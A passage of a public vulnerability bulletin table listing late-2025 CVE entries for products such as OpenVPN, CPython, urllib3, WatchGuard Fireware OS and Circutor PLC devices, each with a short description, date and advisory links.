| OpenVPN--OpenVPN | Improper validation of source IP addresses in OpenVPN version 2.6.0 through 2.7_rc1 allows an attacker to open a session from a different IP address which did not initiate the connection resulting in a denial of service for the originating client | 2025-12-03 | not yet calculated | CVE-2025-13086 | https://community.openvpn.net/Security%20Announcements/CVE-2025-13086 https://www.mail-archive.com/openvpn-announce@lists.sourceforge.net/msg00152.html https://www.mail-archive.com/openvpn-announce@lists.sourceforge.net/msg00151.html |
| OpenVPN--OpenVPN | Interactive service agent in OpenVPN version 2.5.0 through 2.7_rc2 on Windows allows a local authenticated user to connect to the service and trigger an error causing a local denial of service. | 2025-12-03 | not yet calculated | CVE-2025-13751 | https://community.openvpn.net/Security%20Announcements/CVE-2025-13751 https://www.mail-archive.com/openvpn-announce@lists.sourceforge.net/msg00154.htmlhttps:// https://www.mail-archive.com/openvpn-announce@lists.sourceforge.net/msg00153.html |
| Perforce--BlazeMeter | A fix was made in BlazeMeter Jenkins Plugin version 4.27 to allow users only with certain permissions to see the list of available resources like credential IDs, bzm workspaces and bzm project Ids. Prior to this fix, anyone could see this list as a dropdown on the Jenkins UI. | 2025-12-03 | not yet calculated | CVE-2025-13472 | https://portal.perforce.com/s/cve/a91Qi000002bFgTIAU/missing-authorization-in-blazemeter-jenkins-plugin |
| Ping Identity--One-Time Passcode Integration Kit for PingFederate | The OTP Integration Kit for PingFederate fails to enforce HTTP method validation and state validation properly. The server advances the authentication state without verifying the OTP, thereby bypassing multi-factor authentication. | 2025-12-04 | not yet calculated | CVE-2025-27935 | https://support.pingidentity.com/s/article/SECADV051-PingFederate-OTP-Integration-Kit-authentication-bypass https://www.pingidentity.com/en/resources/downloads/pingfederate.html |
| Portkey-AI--gateway | Portkey.ai Gateway is a blazing fast AI Gateway with integrated guardrails. Prior to 1.14.0, the gateway determined the destination baseURL by prioritizing the value in the x-portkey-custom-host request header. The proxy route then appends the client-specified path to perform an external fetch. This can be maliciously used by users for SSRF attacks. This vulnerability is fixed in 1.14.0. | 2025-12-01 | not yet calculated | CVE-2025-66405 | https://github.com/Portkey-AI/gateway/security/advisories/GHSA-hhh5-2cvx-vmfp https://github.com/Portkey-AI/gateway/pull/1372 https://github.com/Portkey-AI/gateway/commit/b5a7825ba5f4e6918deb32d9969899ce2229a885 |
| Pure Storage--PX Enterprise | A vulnerability exists in PX Enterprise whereby sensitive information may be logged under specific conditions. | 2025-12-04 | not yet calculated | CVE-2025-9127 | https://support.purestorage.com/category/m_pure_storage_product_security |
| Python Software Foundation--CPython | When building nested elements using xml.dom.minidom methods such as appendChild() that have a dependency on _clear_id_cache() the algorithm is quadratic. Availability can be impacted when building excessively nested documents. | 2025-12-03 | not yet calculated | CVE-2025-12084 | https://github.com/python/cpython/pull/142146 https://github.com/python/cpython/issues/142145 https://github.com/python/cpython/commit/08d8e18ad81cd45bc4a27d6da478b51ea49486e4 https://github.com/python/cpython/commit/027f21e417b26eed4505ac2db101a4352b7c51a0 https://github.com/python/cpython/commit/ddcd2acd85d891a53e281c773b3093f9db953964 |
| Python Software Foundation--CPython | When reading an HTTP response from a server, if no read amount is specified, the default behavior will be to use Content-Length. This allows a malicious server to cause the client to read large amounts of data into memory, potentially causing OOM or other DoS. | 2025-12-01 | not yet calculated | CVE-2025-13836 | https://github.com/python/cpython/issues/119451 https://github.com/python/cpython/pull/119454 https://github.com/python/cpython/commit/4ce27904b597c77d74dd93f2c912676021a99155 https://github.com/python/cpython/commit/5a4c4a033a4a54481be6870aa1896fad732555b5 https://mail.python.org/archives/list/security-announce@python.org/thread/OQ6G7MKRQIS3OAREC3HNG3D2DPOU34XO/ https://github.com/python/cpython/commit/289f29b0fe38baf2d7cb5854f4bb573cc34a6a15 |
| Python Software Foundation--CPython | When loading a plist file, the plistlib module reads data in size specified by the file itself, meaning a malicious file can cause OOM and DoS issues | 2025-12-01 | not yet calculated | CVE-2025-13837 | https://github.com/python/cpython/pull/119343 https://github.com/python/cpython/issues/119342 https://github.com/python/cpython/commit/694922cf40aa3a28f898b5f5ee08b71b4922df70 https://github.com/python/cpython/commit/71fa8eb8233b37f16c88b6e3e583b461b205d1ba https://github.com/python/cpython/commit/b64441e4852383645af5b435411a6f849dd1b4cb https://mail.python.org/archives/list/security-announce@python.org/thread/2X5IBCJXRQAZ5PSERLHMSJFBHFR3QM2C/ |
| R Radio Network--Radio Network FM Transmitter | R Radio Network FM Transmitter 1.07 allows unauthenticated attackers to access the admin user's password through the system.cgi endpoint, enabling authentication bypass and FM station setup access. | 2025-12-04 | not yet calculated | CVE-2024-58277 | ExploitDB-51855 Security Advisory for ZSL-2023-5802 https://www.vulncheck.com/advisories/r-radio-network-fm-transmitter-107-system-settings-disclosure |
| Remotecontrolio--Remote Keyboard Desktop | Remote Keyboard Desktop 1.0.1 enables remote attackers to execute system commands via the rundll32.exe exported function export, allowing unauthenticated code execution. | 2025-12-04 | not yet calculated | CVE-2025-66576 | ExploitDB-52299 Vendor Homepage Software Link https://www.vulncheck.com/advisories/remote-keyboard-desktop-101-remote-code-execution-rce |
| ReQuest Serious Play LLC--ReQuest Serious Play Media Player | ReQuest Serious Play Media Player 3.0 contains an unauthenticated file disclosure vulnerability when input passed through the 'file' parameter in and script is not properly verified before being used to read web log files. Attackers can exploit this to disclose contents of files from local resources. | 2025-12-05 | not yet calculated | CVE-2020-36878 | Exploit Database Entry 48949 Zero Science Advisory ZSL-2020-5599 https://www.vulncheck.com/advisories/request-serious-play-f-media-player-directory-traversal-file-disclosure |
| ReQuest Serious Play LLC--ReQuest Serious Play Pro | ReQuest Serious Play F3 Media Server versions 7.0.3.4968 (Pro), 7.0.2.4954, 6.5.2.4954, 6.4.2.4681, 6.3.2.4203, and 2.0.1.823 allows unauthenticated attackers to disclose the webserver's Python debug log file containing system information, credentials, paths, processes and command arguments running on the device. Attackers can access sensitive information by visiting the message_log page. | 2025-12-05 | not yet calculated | CVE-2020-36876 | Exploit Database Entry 48950 Software Link Advisory URL https://www.vulncheck.com/advisories/request-serious-play-f-media-server-debug-log-disclosure |
| ReQuest Serious Play LLC--ReQuest Serious Play Pro | ReQuest Serious Play F3 Media Server 7.0.3 contains an unauthenticated remote code execution vulnerability that allows attackers to execute arbitrary commands as the web server user. Attackers can upload PHP executable files via the Quick File Uploader page, resulting in remote code execution on the server. | 2025-12-05 | not yet calculated | CVE-2020-36877 | Exploit Database Entry 48952 Vendor Security Advisory for ZSL-2020-5602 Official Product Homepage https://www.vulncheck.com/advisories/request-serious-play-f-media-server-unauthenticated-rce |
| Revive--Revive Adserver | HackerOne community member Kassem S.(kassem_s94) has reported that username handling in Revive Adserver was still vulnerable to impersonation attacks after the fix for CVE-2025-52672, via several alternate techniques. Homoglyphs based impersonation has been independently reported by other HackerOne users, such as itz_hari_ and khoof. | 2025-12-02 | not yet calculated | CVE-2025-55129 | https://hackerone.com/reports/3434156 |
| rommapp--romm | RomM (ROM Manager) allows users to scan, enrich, browse and play their game collections with a clean and responsive interface. Prior to 4.4.1 and 4.4.1-beta.2, users can read private collections / smart collections belonging to other users by directly accessing their IDs via API. No ownership verification or checking if the collection is public/private before returning collection data. This vulnerability is fixed in 4.4.1 and 4.4.1-beta.2. | 2025-12-03 | not yet calculated | CVE-2025-65096 | https://github.com/rommapp/romm/security/advisories/GHSA-5ghc-8wr3-788c |
| rommapp--romm | RomM (ROM Manager) allows users to scan, enrich, browse and play their game collections with a clean and responsive interface. Prior to 4.4.1 and 4.4.1-beta.2, an Authenticated User can delete collections belonging to other users by directly sending a DELETE request to the collection endpoint. No ownership verification is performed before deleting collections. This vulnerability is fixed in 4.4.1 and 4.4.1-beta.2. | 2025-12-03 | not yet calculated | CVE-2025-65097 | https://github.com/rommapp/romm/security/advisories/GHSA-v7c8-f6xc-rv9g |
| Sanoma--Clickedu | Reflected Cross-site Scripting (XSS) vulnerability in Sanoma's Clickedu. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending them a malicious URL in '/students/carpetes_varies.php'. This vulnerability can be exploited to steal sensitive user data, such as session cookies, or to perform actions on behalf of the user. | 2025-12-01 | not yet calculated | CVE-2025-41070 | https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-sanomas-clickedu |
| Seafile--Seafile | A stored Cross-Site Scripting (XSS) vulnerability has been found in Seafile v12.0.10. This vulnerability allows an attacker to execute arbitrary code in the victim's browser by storing malicious payloads with PUT parámetro 'name' in '/api/v2.1/user/'. | 2025-12-04 | not yet calculated | CVE-2025-41079 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-seafile |
| Seafile--Seafile | A stored Cross-Site Scripting (XSS) vulnerability has been found in Seafile v12.0.10. This vulnerability allows an attacker to execute arbitrary code in the victim's browser by storing malicious payloads with POST parámetro 'p' in '/api/v2.1/repos/{repo_id}/file/'. | 2025-12-04 | not yet calculated | CVE-2025-41080 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-seafile |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow in Circutor SGE-PLC1000/SGE-PLC50 v0.9.2. This vulnerability allows an attacker to remotely exploit memory corruption through the 'read_packet()' function of the TACACSPLUS implementation. | 2025-12-02 | not yet calculated | CVE-2025-11778 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in CircutorSGE-PLC1000/SGE-PLC50 v9.0.2. The 'SetLan' function is invoked when a new configuration is applied. This new configuration function is activated by a management web request, which can be invoked by a user when making changes to the 'index.cgi' web application. The parameters are not being sanitised, which could lead to command injection. | 2025-12-02 | not yet calculated | CVE-2025-11779 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. In the 'showMeterReport()' function, there is an unlimited user input that is copied to a fixed-size buffer via 'sprintf()'. The 'GetParameter(meter)' function retrieves the user input, which is directly incorporated into a buffer without size validation. An attacker can provide an excessively large input for the "meter" parameter. | 2025-12-02 | not yet calculated | CVE-2025-11780 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Use of hardcoded cryptographic keys in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. The affected firmware contains a hardcoded static authentication key. An attacker with local access to the device can extract this key (e.g., by analysing the firmware image or memory dump) and create valid firmware update packages. This bypasses all intended access controls and grants full administrative privileges. | 2025-12-02 | not yet calculated | CVE-2025-11781 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. The 'ShowDownload()' function uses "sprintf()" to format a string that includes the user-controlled input of 'GetParameter(meter)' in the fixed-size buffer 'acStack_4c' (64 bytes) without checking the length. An attacker can provide an excessively long value for the 'meter' parameter that exceeds the 64-byte buffer size. | 2025-12-02 | not yet calculated | CVE-2025-11782 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. The vulnerability is found in the 'AddEvent()' function when copying the user-controlled username input to a fixed-size buffer (48 bytes) without boundary checking. This can lead to memory corruption, resulting in possible remote code execution. | 2025-12-02 | not yet calculated | CVE-2025-11783 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. In the 'ShowMeterDatabase()' function, there is an unlimited user input that is copied to a fixed-size buffer via 'sprintf()'. The 'GetParameter(meter)' function retrieves the user input, which is directly incorporated into a buffer without size validation. An attacker can provide an excessively large input for the 'meter' parameter. | 2025-12-02 | not yet calculated | CVE-2025-11784 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. In the 'ShowMeterPasswords()' function, there is an unlimited user input that is copied to a fixed-size buffer via 'sprintf()'. The 'GetParameter(meter)' function retrieves the user input, which is directly incorporated into a buffer without size validation. An attacker can provide an excessively large input for the 'meter' parameter. | 2025-12-02 | not yet calculated | CVE-2025-11785 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. In the 'SetUserPassword()' function, the 'newPassword' parameter is directly embedded in a shell command string using 'sprintf()' without any sanitisation or validation, and then executed using 'system()'. This allows an attacker to inject arbitrary shell commands that will be executed with the same privileges as the application. | 2025-12-02 | not yet calculated | CVE-2025-11786 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Command injection vulnerability in the operating system in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2 through the 'GetDNS()', 'CheckPing()' and 'TraceRoute()' functions. | 2025-12-02 | not yet calculated | CVE-2025-11787 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Heap-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. In the 'ShowSupervisorParameters()' function, there is an unlimited user input that is copied to a fixed-size buffer via 'sprintf()'. The 'GetParameter(meter)' function retrieves the user input, which is directly incorporated into a buffer without size validation. An attacker can provide an excessively large input for the 'meter' parameter. | 2025-12-02 | not yet calculated | CVE-2025-11788 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Out-of-bounds read vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. The 'DownloadFile' function converts a parameter to an integer using 'atoi()' and then uses it as an index in the 'FilesDownload' array with '(&FilesDownload)[iVar2]'. If the parameter is too large, it will access memory beyond the limits. | 2025-12-02 | not yet calculated | CVE-2025-11789 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| silabs.com--Gecko SDK | When a WF200/WGM160P device is configured to operate as an Access Point, it may be vulnerable to a denial of service triggered by a malformed packet. The device may recover automatically or require a hard reset. | 2025-12-04 | not yet calculated | CVE-2025-12986 | https://community.silabs.com/068Vm00000akaGr |
| silabs.com--Simplicity Studio V6 | The web interface of the Silicon Labs Simplicity Device Manager is exposed publicly and can be used to extract the NTLMv2 hash which an attacker could use to crack the user's domain password. | 2025-12-04 | not yet calculated | CVE-2025-10285 | https://community.silabs.com/a45Vm0000003UcfIAE |
| SOLIDserver--SOLIDserver IPAM | Directory traversal vulnerability in SOLIDserver IPAM v8.2.3. This vulnerability allows an authenticated user with administrator privileges to list directories other than those to which the have authorized access using the 'directory' parameter in '/mod/ajax.php?action=sections/list/list'.For examplem setting the 'directory' parameter to '/' displays files outside the 'LOCAL:///' folder. | 2025-12-02 | not yet calculated | CVE-2025-13879 | https://www.incibe.es/en/incibe-cert/notices/aviso/directory-traversal-vulnerability-efficientips-solidserver-ipam https://efficientip.com/resources/solidserver-ipam-solutions-3/ |
| SolisCloud--Monitoring Platform (Cloud API & Device Control API) | The SolisCloud API suffers from a Broken Access Control vulnerability, specifically an Insecure Direct Object Reference (IDOR), where any authenticated user can access detailed data of any plant by altering the plant_id in the request. | 2025-12-04 | not yet calculated | CVE-2025-13932 | url |
| Sonatype--Nexus Repository | Due to a regression introduced in version 3.83.0, a security header is no longer applied to certain user-uploaded content served from repositories. This may allow an authenticated attacker with repository upload privileges to exploit a stored cross-site scripting (XSS) vulnerability with user context. | 2025-12-04 | not yet calculated | CVE-2025-13488 | https://help.sonatype.com/en/sonatype-nexus-repository-3-87-0-release-notes.html https://support.sonatype.com/hc/en-us/articles/46896142768019 |
| Sony Corporation--INZONE Hub | The installer of INZONE Hub 1.0.10.3 to 1.0.17.0 contains an issue with the DLL search path, which may lead to insecurely loading Dynamic Link Libraries. As a result, arbitrary code may be executed with the privilege of the user invoking the installer. | 2025-12-01 | not yet calculated | CVE-2025-64772 | https://www.sony.com/electronics/support/others-software/inzone-hub https://jvn.jp/en/jp/JVN28247549/ |
| syntax-tree--mdast-util-to-hast | mdast-util-to-hast is an mdast utility to transform to hast. From 13.0.0 to before 13.2.1, multiple (unprefixed) classnames could be added in markdown source by using character references. This could make rendered user supplied markdown code elements appear like the rest of the page. This vulnerability is fixed in 13.2.1. | 2025-12-01 | not yet calculated | CVE-2025-66400 | https://github.com/syntax-tree/mdast-util-to-hast/security/advisories/GHSA-4fh9-h7wg-q85m https://github.com/syntax-tree/mdast-util-to-hast/commit/6fc783ae6abdeb798fd5a68e7f3f21411dde7403 https://github.com/syntax-tree/mdast-util-to-hast/commit/ab3a79570a1afbfa7efef5d4a0cd9b5caafbc5d7 |
| taikoxyz--taiko-mono | Taiko Alethia is an Ethereum-equivalent, permissionless, based rollup designed to scale Ethereum without compromising its fundamental properties. In 2.3.1 and earlier, TaikoInbox._verifyBatches (packages/protocol/contracts/layer1/based/TaikoInbox.sol:627-678) advanced the local tid to whatever transition matched the current blockHash before knowing whether that batch would actually be verified. When the loop later broke (e.g., cooldown window not yet passed or transition invalidated), the function still wrote that newer tid into batches[lastVerifiedBatchId].verifiedTransitionId after decrementing batchId. Result: the last verified batch could end up pointing at a transition index from the next batch (often zeroed), corrupting the verified chain pointer. | 2025-12-04 | not yet calculated | CVE-2025-66559 | https://github.com/taikoxyz/taiko-mono/security/advisories/GHSA-5mxh-r33p-6h5x https://github.com/taikoxyz/taiko-mono/commit/379f5cb4ffe9e1945563ab2c7740bc9f4ea004d8 |
| TCMAN--GIM | Unauthorized access vulnerability in TCMAN GIM v11 version 20250304. This vulnerability allows an unauthenticated attacker to determine whether a user exists on the system by using the 'pda:userId' and 'pda:newPassword' parameters with 'soapaction UnlockUser' in '/WS/PDAWebService.asmx'. | 2025-12-02 | not yet calculated | CVE-2025-41012 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-tcman-gim-2 |
| TCMAN--GIM | SQL injection vulnerability in TCMAN GIM v11 in version 20250304. This vulnerability allows an attacker to retrieve, create, update, and delete databases by sending a GET request using the 'idmant' parameter in '/PC/frmEPIS.aspx'. | 2025-12-02 | not yet calculated | CVE-2025-41013 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-tcman-gim-2 |
| TCMAN--GIM | User Enumeration Vulnerability in TCMAN GIM v11 version 20250304. This vulnerability allows an unauthenticated attacker to determine whether a user exists on the system. The vulnerability is exploitable through the 'pda:username' parameter with 'soapaction GetLastDatePasswordChange' in '/WS/PDAWebService.asmx'. | 2025-12-02 | not yet calculated | CVE-2025-41014 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-tcman-gim-2 |
| TCMAN--GIM | User Enumeration Vulnerability in TCMAN GIM v11 version 20250304. This vulnerability allows an unauthenticated attacker to determine whether a user exists on the system. The vulnerability is exploitable through the 'pda:username' parameter with 'soapaction GetUserQuestionAndAnswer' in '/WS/PDAWebService.asmx'. | 2025-12-02 | not yet calculated | CVE-2025-41015 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-tcman-gim-2 |
| The Qt Company--Qt | Allocation of Resources Without Limits or Throttling, Improper Validation of Specified Quantity in Input vulnerability in The Qt Company Qt on Windows, MacOS, Linux, iOS, Android, x86, ARM, 64 bit, 32 bit allows Excessive Allocation. This issue affects users of the Text component in Qt Quick. Missing validation of the width and height in the <img> tag could cause an application to become unresponsive. This issue affects Qt: from 5.0.0 through 6.5.10, from 6.6.0 through 6.8.5, from 6.9.0 through 6.10.0. | 2025-12-03 | not yet calculated | CVE-2025-12385 | https://codereview.qt-project.org/c/qt/qtdeclarative/+/687239 https://codereview.qt-project.org/c/qt/qtdeclarative/+/687766 |
| TOTOLINK--N300RT | TOTOLINK N300RT wireless router firmware versions prior to V3.4.0-B20250430 (discovered in V2.1.8-B20201030.1539) contain an OS command injection vulnerability in the Boa formWsc handling functionality. An unauthenticated attacker can send specially crafted requests to trigger command execution via the targetAPSsid request parameter. | 2025-12-03 | not yet calculated | CVE-2025-34319 | https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/154/ids/36.html https://totolink.tw/support_view/N300RT https://www.vulncheck.com/advisories/totolink-n300rt-boa-formwsc-rce |
| Unknown--db-access | The db-access WordPress plugin through 0.8.7 does not have authorization in an AJAX action, allowing any authenticated users, such as subscriber to perform SQLI attacks | 2025-12-02 | not yet calculated | CVE-2025-13000 | https://wpscan.com/vulnerability/aec53f87-6500-4c8a-925a-146be61bbabf/ |
| Unknown--donation | The donation WordPress plugin through 1.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing high privilege users, such as admin to perform SQL injection attacks | 2025-12-02 | not yet calculated | CVE-2025-13001 | https://wpscan.com/vulnerability/4e7a8154-46bf-44c9-ad9a-273e99ae2104/ |
| Unknown--Timetable and Event Schedule by MotoPress ver. < 2.4.16 | The Timetable and Event Schedule by MotoPress WordPress plugin before 2.4.16 does not verify a user has access to a specific event when duplicating, leading to arbitrary event disclosure when to users with a role as low as Contributor. | 2025-12-03 | not yet calculated | CVE-2025-12954 | https://wpscan.com/vulnerability/f15dd1ca-aa40-4d3b-9625-e3ace744374d/ |
| Unknown--UNA CMS ver 9.0.0 | UNA CMS versions 9.0.0-RC1 - 14.0.0-RC4 contain a PHP object injection vulnerability in BxBaseMenuSetAclLevel.php where the profile_id POST parameter is passed to PHP unserialize() without proper handling, allowing remote, unauthenticated attackers to inject arbitrary PHP objects and potentially write and execute arbitrary PHP code. | 2025-12-04 | not yet calculated | CVE-2025-66571 | ExploitDB-52139 UNA CMS Homepage UNA CMS GitHub Repository Karma Security Advisory https://www.vulncheck.com/advisories/una-cms-900-rc1-1400-rc4-php-object-injection |
| Unknown--Upload.am plugin ver. < 1.0.1 | The Upload.am WordPress plugin before 1.0.1 is vulnerable to arbitrary option disclosure due to a missing capability check on its AJAX request handler, allowing users such as contributor to view site options. | 2025-12-02 | not yet calculated | CVE-2025-12630 | https://wpscan.com/vulnerability/531537f1-5547-4b0f-9e11-3f8a0b2589f5/ |
| urllib3--urllib3 | urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.24 and prior to 2.6.0, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. This vulnerability is fixed in 2.6.0. | 2025-12-05 | not yet calculated | CVE-2025-66418 | https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53 https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8 |
| urllib3--urllib3 | urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.0 and prior to 2.6.0, the Streaming API improperly handles highly compressed data. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation. The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data. | 2025-12-05 | not yet calculated | CVE-2025-66471 | https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37 https://github.com/urllib3/urllib3/commit/c19571de34c47de3a766541b041637ba5f716ed7 |
| VeePN--VeeVPN | VeeVPN 1.6.1 contains an unquoted service path vulnerability in the VeePNService that allows remote attackers to execute code during startup or reboot with escalated privileges. Attackers can exploit this by providing a malicious service name, allowing them to inject commands and run as LocalSystem. | 2025-12-04 | not yet calculated | CVE-2025-66575 | ExploitDB-52088 VeePN Homepage VeePN GitHub Repository https://www.vulncheck.com/advisories/veevpn-161-unquoted-service-path-remote-code-execution |
| WatchGuard--Fireware OS | A memory corruption vulnerability in WatchGuard Fireware OS may allow an unauthenticated attacker to trigger a Denial of Service (DoS) condition in the Mobile User VPN with IKEv2 and the Branch Office VPN using IKEv2 when configured with a dynamic gateway peer. This vulnerability affects Fireware OS 12.0 up to and including 12.11.4 and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-11838 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00018 |
| WatchGuard--Fireware OS | An Out-of-bounds Write vulnerability in WatchGuard Fireware OS's certificate request command could allow an authenticated privileged user to execute arbitrary code via specially crafted CLI commands.This vulnerability affects Fireware OS 12.0 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-12026 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00017 |
| WatchGuard--Fireware OS | An Out-of-bounds Write vulnerability in WatchGuard Fireware OS's CLI could allow an authenticated privileged user to execute arbitrary code via specially crafted IPSec configuration CLI commands.This vulnerability affects Fireware OS 11.0 up to and including 11.12.4+541730, 12.0 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-12195 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00019 |
| WatchGuard--Fireware OS | An Out-of-bounds Write vulnerability in WatchGuard Fireware OS's CLI could allow an authenticated privileged user to execute arbitrary code via a specially crafted CLI command.This vulnerability affects Fireware OS 12.0 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-12196 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00020 |
| WatchGuard--Fireware OS | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WatchGuard Fireware OS (Tigerpaw Technology Integration module) allows Stored XSS.This issue affects Fireware OS 12.4 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-13936 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00021 |
| WatchGuard--Fireware OS | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WatchGuard Fireware OS (ConnectWise Technology Integration module) allows Stored XSS.This issue affects Fireware OS 12.4 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-13937 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00022 |
| WatchGuard--Fireware OS | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WatchGuard Fireware OS (Autotask Technology Integration module) allows Stored XSS.This issue affects Fireware OS 12.4 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-13938 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00023 |
| WatchGuard--Fireware OS | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WatchGuard Fireware OS (Gateway Wireless Controller module) allows Stored XSS.This issue affects Fireware OS 11.7.2 up to and including 11.12.4+541730, 12.0 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-13939 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00024 |
| WatchGuard--Fireware OS | An Expected Behavior Violation [CWE-440] vulnerability in WatchGuard Fireware OS may allow an attacker to bypass the Fireware OS boot time system integrity check and prevent the Firebox from shutting down in the event of a system integrity check failure. The on-demand system integrity check in the Fireware Web UI will correctly show a failed system integrity check message in the event of a failure.This issue affects Fireware OS: from 12.8.1 through 12.11.4, from 2025.1 through 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-13940 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00026 |
| WatchGuard--Fireware OS | An XPath Injection vulnerability in WatchGuard Fireware OS may allow a remote unauthenticated attacker to retrieve sensitive information from the Firebox configuration through an exposed authentication or management web interface. This vulnerability only affects Firebox systems that have at least one authentication hotspot configured.This issue affects Fireware OS 11.11 up to and including 11.12.4+541730, 12.0 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-1545 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00025 |
| WatchGuard--Fireware OS | A stack-based buffer overflow vulnerability [CWE-121] in WatchGuard Fireware OS's certificate request command could allow an authenticated privileged user to execute arbitrary code via specially crafted CLI commands.This issue affects Fireware OS: from 12.0 through 12.5.12+701324, from 12.6 through 12.11.2. | 2025-12-04 | not yet calculated | CVE-2025-1547 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00013 |
